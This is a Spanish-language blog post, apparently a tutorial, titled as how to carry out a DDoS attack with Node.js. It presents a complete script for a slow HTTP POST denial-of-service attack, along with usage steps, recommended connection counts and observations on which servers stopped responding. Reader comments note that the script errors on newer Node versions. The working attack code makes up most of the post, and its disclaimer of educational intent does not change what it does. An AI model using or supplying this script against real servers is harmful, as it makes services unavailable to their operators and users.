Categor铆as: Sin categor铆a

HACER UN ATAQUE DDOS CON NODEJS ?

Videotutorial

Codigo:

//Splat is intended to be a demonstration of the HTTP POST Denial of Service attack described on http://www.acunetix.com/blog/web-security-zone/articles/http-post-denial-service/.
//This script is not meant for nefarious purposes but rather to educate and for testing.
//It is intended to demonstrate how opening lots of simultaneous POST connections to a server, specifying a long Content-Length, and feeding data to the server slowly can cause a mis-configured server to be made unresponsive.

//There's no license on this thing. The author takes no freaking responsibility for what dumbasses decide to do with what is a very basic script that took the author a few minutes to write. Use at your own risk, don't bother the author about it, feel free to fork it, pork it, or whatever you want.

//USAGE:
//1) Customize the "url" variable to a domain. DO NOT USE http:// or https://
//2) Set "max_connections" to how many simultaneous connections you want to open. 125 is recommended or Node might freak out.
//3) Set "length" to the total number of bytes that should be sent over time. Each byte is sent once per second.
//4) Run it from your terminal in the node-splat directory, "node app.js"
//5) If you don't know what Node.js is, go to http://nodejs.org

//Running more than 125 max_connections tended to make node.js on the dev system crash. You may be able to do more. Run multiple instances (separate terminal windows on a Mac) to achieve the desired effect.
//On the test system (Mac Pro), Apache on localhost stopped responding with 250 connections. The author's website running on lighttpd handled up to about 1125 simultaneous connections before hanging.
var http = require('http');
//This is the domain to connect to.
var url = 'ejemplo.com';
var max_connections = 125, //This is the number of simultaneous connections to open.
length = 1000000; //The total content length to send.
var params = {
'host': url,
'Content-Length': length
}
//create a number of connections for the url
var connections = [];
for(var i=0; i<max_connections; i++){

var obj = {}
obj.cnx = http.createClient(80, url);
obj.req = obj.cnx.request('post','/aaa/', params);
connections.push(obj);
}
var next = function(cnt){
for(var i=0; i<max_connections; i++){
//request.write('a');
connections[i].req.write('a');
}
console.log(cnt);
cnt++;
var x = setTimeout(function(){
next(cnt);
}, 1000);
if( cnt > length ){
clearInterval(x);

for(var i=0; i<max_connections; i++){
connections[i].req.end();
}
}
}
next(1);

Instalar nodejs en ubuntu 14

Fuente: http://www.acunetix.com/blog/articles/http-post-denial-service/

Eugenio Chaparro

Ver comentarios

  • me da error en http.createClient

  • Es por la versi贸n de nodejs

Compartir
Publicado por
Eugenio Chaparro

Entradas recientes

馃煝Editar c贸digo de un m贸dulo en Dolibarr [04]

馃煝Editar c贸digo de un m贸dulo en Dolibarr [04]

En este tutorial vamos editar el c贸digo de nuestro m贸dulo personas para poder personalizar algunas…

2 meses hace
馃煝Crear un sub_m贸dulo en Dolibarr [03]

馃煝Crear un sub_m贸dulo en Dolibarr [03]

En este tutorial vamos a crear un sub m贸dulo llamado seguridad que ser谩 muy parecido…

2 meses hace
馃煝Modificar un m贸dulo en Dolibarr [02]

馃煝Modificar un m贸dulo en Dolibarr [02]

En este tutorial aprenderemos a editar el objeto personas del modulo persona que creamos en…

2 meses hace
馃煝Constructor de m贸dulos en Dolibarr

馃煝Constructor de m贸dulos en Dolibarr

Como mencionamos anteriormente Dolibarr es un proyecto realizado sobre la base de una pol铆tica clara:…

2 meses hace
馃煝Tickets en Dolibarr [19]

馃煝Tickets en Dolibarr [19]

Los ticket en dolibarr nos ayudan a comunicar inconveniente en nuestros productos y servicios dentro…

2 meses hace
馃煝Agenda en Dolibarr [18]

馃煝Agenda en Dolibarr [18]

Las agendas en dolibarr nos ayudan a ver las actividades realizadas en proceso y por…

2 meses hace